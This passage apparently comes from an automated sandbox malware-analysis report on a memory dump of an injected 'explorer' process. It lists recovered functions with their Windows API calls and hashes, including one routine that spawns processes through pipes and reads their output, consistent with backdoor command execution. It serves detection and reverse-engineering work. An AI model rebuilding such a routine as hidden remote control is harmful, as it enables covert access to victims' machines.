                                                  • Instruction Fuzzy Hash: FA516D7063077A76DB38C9288FA5BBEAFB95F06A04F0C445EE883DF680D6D199C58351
                                                  Function 032407F2 Relevance: 1.3, APIs: 1, Instructions: 5memoryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.3893096926.0000000003201000.00000020.00000001.01000000.00000000.sdmp, Offset: 03200000, based on PE: true
                                                  • Associated: 0000000A.00000002.3893024528.0000000003200000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3893433424.0000000003251000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3893496020.0000000003266000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3893535686.000000000326D000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3893612156.0000000003273000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_3200000_explorer.jbxd
                                                  Similarity
                                                  • API ID: HeapProcess
                                                  • String ID:
                                                  • API String ID: 54951025-0
                                                  • Opcode ID: 4683880ee112d70a38ba49ec0d2e5ee9bfdeb01050ad70e992aa48d29fc7f75f
                                                  • Instruction ID: de495f2fdaaba27b575c0a47dde3049d96b28ff6b269deaf04e322c662cd079f
                                                  • Opcode Fuzzy Hash: 4683880ee112d70a38ba49ec0d2e5ee9bfdeb01050ad70e992aa48d29fc7f75f
                                                  • Instruction Fuzzy Hash: 80A02430700340CF47405F35770C34D35DC5D001C0704C01CD404C4044DF304CD04700
                                                  Function 03205450 Relevance: .7, Instructions: 701COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.3893096926.0000000003201000.00000020.00000001.01000000.00000000.sdmp, Offset: 03200000, based on PE: true
                                                  • Associated: 0000000A.00000002.3893024528.0000000003200000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3893433424.0000000003251000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3893496020.0000000003266000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3893535686.000000000326D000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3893612156.0000000003273000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_3200000_explorer.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: a0125b2b6f3271bb0e0838f2e5ca8de0448c63394430444077274df520b9ad3c
                                                  • Instruction ID: c5f62366446c9ec189d0fc364b87e03a9094e5241d744c9905f7e58305fe1bfa
                                                  • Opcode Fuzzy Hash: a0125b2b6f3271bb0e0838f2e5ca8de0448c63394430444077274df520b9ad3c
                                                  • Instruction Fuzzy Hash: 4C224EB3F515144BDB0CCA9DDCA27EDB2E3AFD8214B0E803DE40AE3745EA79D9158A44
                                                  Function 0323D169 Relevance: .6, Instructions: 637COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.3893096926.0000000003201000.00000020.00000001.01000000.00000000.sdmp, Offset: 03200000, based on PE: true
                                                  • Associated: 0000000A.00000002.3893024528.0000000003200000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3893433424.0000000003251000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3893496020.0000000003266000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3893535686.000000000326D000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3893612156.0000000003273000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_3200000_explorer.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 41036502975c833dc8adcf0b87a21ff157c83fcefe0eebf078b2444ffee8eecb
                                                  • Instruction ID: 07d2e8092eb4117fedf16051d5f205d476437a362b573da8c89c6e43dd85721c
                                                  • Opcode Fuzzy Hash: 41036502975c833dc8adcf0b87a21ff157c83fcefe0eebf078b2444ffee8eecb
                                                  • Instruction Fuzzy Hash: 74322462D39F014DD723A538E826335A28DAFB73C5F65D727E81AB5A99EB38D1C34100
                                                  Function 03241BD7 Relevance: .3, Instructions: 327COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.3893096926.0000000003201000.00000020.00000001.01000000.00000000.sdmp, Offset: 03200000, based on PE: true
                                                  • Associated: 0000000A.00000002.3893024528.0000000003200000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3893433424.0000000003251000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3893496020.0000000003266000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3893535686.000000000326D000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3893612156.0000000003273000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_3200000_explorer.jbxd
                                                  Similarity
                                                  • API ID: ErrorLastProcess_free$CurrentFeatureInfoLocalePresentProcessorTerminate
                                                  • String ID:
                                                  • API String ID: 4283097504-0
                                                  • Opcode ID: 5ca300ac9963780c8d98e504bb5d1d63758742cbc1925deaa18f1a61b65cfbaf
                                                  • Instruction ID: 01b613d7ac49b922a516a5dd360839fbb1318fdd8a937e27217009058c94c25a
                                                  • Opcode Fuzzy Hash: 5ca300ac9963780c8d98e504bb5d1d63758742cbc1925deaa18f1a61b65cfbaf
                                                  • Instruction Fuzzy Hash: 67B1F6796207069BDB3CDF24CC81AB7B3A8EF44708F08446DD9878A684EAB5B5D5CB50
                                                  Function 03204EF0 Relevance: .2, Instructions: 235COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.3893096926.0000000003201000.00000020.00000001.01000000.00000000.sdmp, Offset: 03200000, based on PE: true
                                                  • Associated: 0000000A.00000002.3893024528.0000000003200000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3893433424.0000000003251000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3893496020.0000000003266000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3893535686.000000000326D000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3893612156.0000000003273000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_3200000_explorer.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: acbe3288cd8359e25a91e000eb5ad32d0824fa8d9587badb9ab0f61785475576
                                                  • Instruction ID: 0c4d399e52484990d5bf05f845b11245b367c77bb1d03db123a3011e3c62e6c2
                                                  • Opcode Fuzzy Hash: acbe3288cd8359e25a91e000eb5ad32d0824fa8d9587badb9ab0f61785475576
                                                  • Instruction Fuzzy Hash: 6291F475A182898FDB11CF68C4907EEFBF6AF5A300F24859CD49197783C3758589CB90
                                                  Function 032051A0 Relevance: .2, Instructions: 230COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.3893096926.0000000003201000.00000020.00000001.01000000.00000000.sdmp, Offset: 03200000, based on PE: true
                                                  • Associated: 0000000A.00000002.3893024528.0000000003200000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3893433424.0000000003251000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3893496020.0000000003266000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3893535686.000000000326D000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3893612156.0000000003273000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_3200000_explorer.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: c09a02179e68de4907f61c74d42ae33c82b1a8c0bcb31d17f3a982bb161ca329
                                                  • Instruction ID: 533eb1438b02bfb7a249b3e4073998f8a38b0974264981ed70b0b8addbe50126
                                                  • Opcode Fuzzy Hash: c09a02179e68de4907f61c74d42ae33c82b1a8c0bcb31d17f3a982bb161ca329
                                                  • Instruction Fuzzy Hash: 9D810375E282568FDB05CF68D4907EEFBB5BF1A300F684269C811A7783C3759489CBA0
                                                  Function 032460F4 Relevance: .1, Instructions: 104COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.3893096926.0000000003201000.00000020.00000001.01000000.00000000.sdmp, Offset: 03200000, based on PE: true
                                                  • Associated: 0000000A.00000002.3893024528.0000000003200000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3893433424.0000000003251000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3893496020.0000000003266000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3893535686.000000000326D000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3893612156.0000000003273000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_3200000_explorer.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 5f55742a388893c9b38d9a713f9677d27592bba72c4f4b3963d978fb9e59a072
                                                  • Instruction ID: b2976cfdd5755e4bb6c1948fc3a09b31adcff5622d126861e0cd3c6b45b78289
                                                  • Opcode Fuzzy Hash: 5f55742a388893c9b38d9a713f9677d27592bba72c4f4b3963d978fb9e59a072
                                                  • Instruction Fuzzy Hash: 0821B373F204394B7B0CC47ECC562BDB6E1C68C501745823EF8A6EA2C1D968DA17E2E4
                                                  Function 03245FD4 Relevance: .1, Instructions: 81COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.3893096926.0000000003201000.00000020.00000001.01000000.00000000.sdmp, Offset: 03200000, based on PE: true
                                                  • Associated: 0000000A.00000002.3893024528.0000000003200000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3893433424.0000000003251000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3893496020.0000000003266000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3893535686.000000000326D000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3893612156.0000000003273000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_3200000_explorer.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: b1c181437ad21720d7f71e0dd2a05aa27be0fac18536c8a7819651d44ef234f2
                                                  • Instruction ID: c86e310d313600a0d8e40a00326970dd9835048a7e34b86bb7c8907ad286cd6f
                                                  • Opcode Fuzzy Hash: b1c181437ad21720d7f71e0dd2a05aa27be0fac18536c8a7819651d44ef234f2
                                                  • Instruction Fuzzy Hash: 57118623F30C255B675C816D8C172BAA5D6EBD815070F533AD827E72C4E9A4DE23D290
                                                  Function 0322B7C0 Relevance: .1, Instructions: 76COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.3893096926.0000000003201000.00000020.00000001.01000000.00000000.sdmp, Offset: 03200000, based on PE: true
                                                  • Associated: 0000000A.00000002.3893024528.0000000003200000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3893433424.0000000003251000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3893496020.0000000003266000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3893535686.000000000326D000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3893612156.0000000003273000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_3200000_explorer.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                  • Instruction ID: 0cb5f3e080e27c551dfc369b1dd46509557ecb03d4d2bd5df1ae4a06dfe0682a
                                                  • Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                  • Instruction Fuzzy Hash: 49110B776210A363D604CA3DECB46B6EF95EAC5220B2D8379D8494B754D222A1C59602
                                                  Function 03208280 Relevance: 30.0, APIs: 16, Strings: 1, Instructions: 257pipeprocessfileCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetTempPathA.KERNEL32(00000080,?), ref: 0320832D
                                                  • CreatePipe.KERNEL32(00000000,00000000,0000000C,00000000), ref: 03208403
                                                  • SetHandleInformation.KERNEL32(00000000,00000001,00000000), ref: 03208415
                                                  • Wow64DisableWow64FsRedirection.KERNEL32(?), ref: 03208459
                                                  • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000001,00000000,00000000,?,00000044,?), ref: 03208481
                                                  • Wow64RevertWow64FsRedirection.KERNEL32(00000000), ref: 0320848F
                                                  • WaitForSingleObject.KERNEL32(?,00000064), ref: 032084B8
                                                  • PeekNamedPipe.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000), ref: 032084DA
                                                  • PeekNamedPipe.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000), ref: 032084FE
                                                  • ReadFile.KERNEL32(00000000,?,0000007F,00000000,00000000), ref: 03208525
                                                  • PeekNamedPipe.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000), ref: 0320856A
                                                  • CloseHandle.KERNEL32(?), ref: 03208581
                                                  • CloseHandle.KERNEL32(?), ref: 03208589
                                                  • CloseHandle.KERNEL32(00000000), ref: 03208591
                                                  • CloseHandle.KERNEL32(00000000), ref: 03208599
                                                  • GetLastError.KERNEL32 ref: 032085A3
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.3893096926.0000000003201000.00000020.00000001.01000000.00000000.sdmp, Offset: 03200000, based on PE: true
                                                  • Associated: 0000000A.00000002.3893024528.0000000003200000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3893433424.0000000003251000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3893496020.0000000003266000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3893535686.000000000326D000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3893612156.0000000003273000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_3200000_explorer.jbxd
                                                  Similarity
                                                  • API ID: Handle$ClosePipeWow64$NamedPeek$CreateRedirection$DisableErrorFileInformationLastObjectPathProcessReadRevertSingleTempWait
                                                  • String ID: D
                                                  • API String ID: 3215130363-2746444292
                                                  • Opcode ID: 003791709709a7fb76955c4aef5e9afa4657489cdf3278dbbeda1aed4d856313
                                                  • Instruction ID: 6458f553896f11955496ecffcdbf0b33cc0d5043d0006dca94291b8352715c00
                                                  • Opcode Fuzzy Hash: 003791709709a7fb76955c4aef5e9afa4657489cdf3278dbbeda1aed4d856313
                                                  • Instruction Fuzzy Hash: 39A15F71950229ABEF20DF64DC49BDEBB79AF04700F1441D5EA08AA1C1DBB5ABC4CF91
                                                  Function 0324008F Relevance: 25.9, APIs: 17, Instructions: 411COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.3893096926.0000000003201000.00000020.00000001.01000000.00000000.sdmp, Offset: 03200000, based on PE: true
                                                  • Associated: 0000000A.00000002.3893024528.0000000003200000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3893433424.0000000003251000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3893496020.0000000003266000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3893535686.000000000326D000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3893612156.0000000003273000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_3200000_explorer.jbxd
                                                  Similarity
                                                  • API ID: _free$___from_strstr_to_strchr
                                                  • String ID:
                                                  • API String ID: 3409252457-0
                                                  • Opcode ID: 95e29565ff6870d770753e985e472f3f53c09d7d7233ae1637e19afc5a28e4a7
                                                  • Instruction ID: 9276ed019008ee39708543ae09b6d1eeb56c663399da6f9918a8ec671cc0c24d
                                                  • Opcode Fuzzy Hash: 95e29565ff6870d770753e985e472f3f53c09d7d7233ae1637e19afc5a28e4a7
                                                  • Instruction Fuzzy Hash: 78D1FBB59243069FDB29FFB89880A6DF7B8AF05710F14C16DDB45AB280EBB195C0CB51
                                                  Function 03232A63 Relevance: 22.9, APIs: 15, Instructions: 357COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.3893096926.0000000003201000.00000020.00000001.01000000.00000000.sdmp, Offset: 03200000, based on PE: true
                                                  • Associated: 0000000A.00000002.3893024528.0000000003200000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3893433424.0000000003251000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3893496020.0000000003266000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3893535686.000000000326D000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3893612156.0000000003273000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_3200000_explorer.jbxd
                                                  Similarity
                                                  • API ID: _free$Info
                                                  • String ID:
                                                  • API String ID: 2509303402-0
                                                  • Opcode ID: 84ec66df91b052dcdd40e0d374ddcf52b0db64fcf85c68ed1013b4a008181349
                                                  • Instruction ID: 089b2cd4f87ce1420c7010c97c2e4aa945bd8dbe8210dbb54639536b7ac5b730
                                                  • Opcode Fuzzy Hash: 84ec66df91b052dcdd40e0d374ddcf52b0db64fcf85c68ed1013b4a008181349
                                                  • Instruction Fuzzy Hash: E5D191B5D20306DFDB21CF68C880BEEBBF5BF19700F184569E995AB251DB70A885CB50
                                                  Function 032299FA Relevance: 21.1, APIs: 8, Strings: 4, Instructions: 51libraryloaderCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • InitializeCriticalSectionAndSpinCount.KERNEL32(03268FA8,00000FA0,?,?,032299D8), ref: 03229A06
                                                  • GetModuleHandleW.KERNEL32(api-ms-win-core-synch-l1-2-0.dll,?,?,032299D8), ref: 03229A11
                                                  • GetModuleHandleW.KERNEL32(kernel32.dll,?,?,032299D8), ref: 03229A22
                                                  • GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 03229A34
                                                  • GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 03229A42
                                                  • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,?,?,032299D8), ref: 03229A65
                                                  • DeleteCriticalSection.KERNEL32(03268FA8,00000007,?,?,032299D8), ref: 03229A81
                                                  • CloseHandle.KERNEL32(00000000,?,?,032299D8), ref: 03229A91
                                                  Strings
                                                  • SleepConditionVariableCS, xrefs: 03229A2E
                                                  • WakeAllConditionVariable, xrefs: 03229A3A
                                                  • kernel32.dll, xrefs: 03229A1D
                                                  • api-ms-win-core-synch-l1-2-0.dll, xrefs: 03229A0C
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.3893096926.0000000003201000.00000020.00000001.01000000.00000000.sdmp, Offset: 03200000, based on PE: true
                                                  • Associated: 0000000A.00000002.3893024528.0000000003200000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3893433424.0000000003251000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3893496020.0000000003266000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3893535686.000000000326D000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3893612156.0000000003273000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_3200000_explorer.jbxd
                                                  Similarity
                                                  • API ID: Handle$AddressCriticalModuleProcSection$CloseCountCreateDeleteEventInitializeSpin
                                                  • String ID: SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
                                                  • API String ID: 2565136772-3242537097
                                                  • Opcode ID: 764f3bca5f337007924e20fcae5f45577e0d3720f1982cb1a56911c594c3eb04
                                                  • Instruction ID: 04735f44fd86e6b884033d44bc631e938ca4e4104f14537f62471af535ab6661
                                                  • Opcode Fuzzy Hash: 764f3bca5f337007924e20fcae5f45577e0d3720f1982cb1a56911c594c3eb04
                                                  • Instruction Fuzzy Hash: A001B571AA1322FFDB20FB74BC0CB6A3A5DBF44B51B198414FD15D6148DBB0D6D08661
                                                  Function 0324170D Relevance: 19.6, APIs: 13, Instructions: 113COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  • ___free_lconv_mon.LIBCMT ref: 03241751
                                                    • Part of subcall function 03240A07: _free.LIBCMT ref: 03240A24
                                                    • Part of subcall function 03240A07: _free.LIBCMT ref: 03240A36
                                                    • Part of subcall function 03240A07: _free.LIBCMT ref: 03240A48
                                                    • Part of subcall function 03240A07: _free.LIBCMT ref: 03240A5A
                                                    • Part of subcall function 03240A07: _free.LIBCMT ref: 03240A6C
                                                    • Part of subcall function 03240A07: _free.LIBCMT ref: 03240A7E
                                                    • Part of subcall function 03240A07: _free.LIBCMT ref: 03240A90
                                                    • Part of subcall function 03240A07: _free.LIBCMT ref: 03240AA2
                                                    • Part of subcall function 03240A07: _free.LIBCMT ref: 03240AB4
                                                    • Part of subcall function 03240A07: _free.LIBCMT ref: 03240AC6
                                                    • Part of subcall function 03240A07: _free.LIBCMT ref: 03240AD8
                                                    • Part of subcall function 03240A07: _free.LIBCMT ref: 03240AEA
                                                    • Part of subcall function 03240A07: _free.LIBCMT ref: 03240AFC
                                                  • _free.LIBCMT ref: 03241746
                                                    • Part of subcall function 032381B6: HeapFree.KERNEL32(00000000,00000000,?,0324115C,?,00000000,?,8B18EC83,?,032413FF,?,00000007,?,?,032418A4,?), ref: 032381CC
                                                    • Part of subcall function 032381B6: GetLastError.KERNEL32(?,?,0324115C,?,00000000,?,8B18EC83,?,032413FF,?,00000007,?,?,032418A4,?,?), ref: 032381DE
                                                  • _free.LIBCMT ref: 03241768
                                                  • _free.LIBCMT ref: 0324177D
                                                  • _free.LIBCMT ref: 03241788
                                                  • _free.LIBCMT ref: 032417AA
                                                  • _free.LIBCMT ref: 032417BD
                                                  • _free.LIBCMT ref: 032417CB
                                                  • _free.LIBCMT ref: 032417D6
                                                  • _free.LIBCMT ref: 0324180E
                                                  • _free.LIBCMT ref: 03241815
                                                  • _free.LIBCMT ref: 03241832
                                                  • _free.LIBCMT ref: 0324184A
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.3893096926.0000000003201000.00000020.00000001.01000000.00000000.sdmp, Offset: 03200000, based on PE: true
                                                  • Associated: 0000000A.00000002.3893024528.0000000003200000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3893433424.0000000003251000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3893496020.0000000003266000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3893535686.000000000326D000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3893612156.0000000003273000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_3200000_explorer.jbxd
                                                  Similarity
                                                  • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                  • String ID:
                                                  • API String ID: 161543041-0
                                                  • Opcode ID: dc3175908c6676d23b1b35d35cf79300b4269b8902ce5ca1fb3f54f9f9ceaba4
                                                  • Instruction ID: e26c7d40e0c3d9d2b4934123ce043ead2f1038f02ffeef3410dad3ec701e4f48
                                                  • Opcode Fuzzy Hash: dc3175908c6676d23b1b35d35cf79300b4269b8902ce5ca1fb3f54f9f9ceaba4
                                                  • Instruction Fuzzy Hash: 6E319E756203069FEF36EA38D944B56B3E9AF11710F184429E499EB291DFB4F8D4CB10
                                                  Function 03240B05 Relevance: 18.4, APIs: 12, Instructions: 373COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.3893096926.0000000003201000.00000020.00000001.01000000.00000000.sdmp, Offset: 03200000, based on PE: true
                                                  • Associated: 0000000A.00000002.3893024528.0000000003200000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3893433424.0000000003251000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3893496020.0000000003266000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3893535686.000000000326D000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3893612156.0000000003273000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_3200000_explorer.jbxd
                                                  Similarity
                                                  • API ID: _free
                                                  • String ID:
                                                  • API String ID: 269201875-0
                                                  • Opcode ID: 75c74cba25196f3ed0035144129fd45995bed9ab27ea90e2d4eb243e92b42166
                                                  • Instruction ID: e17c877d914753fdcb96414bf0064c5324a5ef04a174749f46a8306b1707e6e9
                                                  • Opcode Fuzzy Hash: 75c74cba25196f3ed0035144129fd45995bed9ab27ea90e2d4eb243e92b42166
                                                  • Instruction Fuzzy Hash: DEC132B6E54315BBDB20DBA8CC41FDEB7F8AF09B04F144065FA45FB281D6B099809B94
                                                  Function 0323B52D Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 301COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.3893096926.0000000003201000.00000020.00000001.01000000.00000000.sdmp, Offset: 03200000, based on PE: true
                                                  • Associated: 0000000A.00000002.3893024528.0000000003200000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3893433424.0000000003251000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3893496020.0000000003266000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3893535686.000000000326D000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3893612156.0000000003273000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_3200000_explorer.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID: 0-3907804496
                                                  • Opcode ID: f22a35b174776d38b576766d27a5ffa3afd3e640bb64fb40334396a18684c663
                                                  • Instruction ID: 7abdcd9d64746af749e3598aefe73556516d115ea11c2f484b9ca4b476638693
                                                  • Opcode Fuzzy Hash: f22a35b174776d38b576766d27a5ffa3afd3e640bb64fb40334396a18684c663
                                                  • Instruction Fuzzy Hash: 12C1B2B5E24306EFDF15EF99D884BADBBB1EF4A310F048159E441AB391C7B09981CB61
                                                  Function 03243A9F Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 273COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 03243758: CreateFileW.KERNEL32(00000000,00000000,?,03243B48,?,?,00000000,?,03243B48,00000000,0000000C), ref: 03243775
                                                  • GetLastError.KERNEL32 ref: 03243BB3
                                                  • __dosmaperr.LIBCMT ref: 03243BBA
                                                  • GetFileType.KERNEL32(00000000), ref: 03243BC6
                                                  • GetLastError.KERNEL32 ref: 03243BD0
                                                  • __dosmaperr.LIBCMT ref: 03243BD9
                                                  • CloseHandle.KERNEL32(00000000), ref: 03243BF9
                                                  • CloseHandle.KERNEL32(032373F1), ref: 03243D46
                                                  • GetLastError.KERNEL32 ref: 03243D78
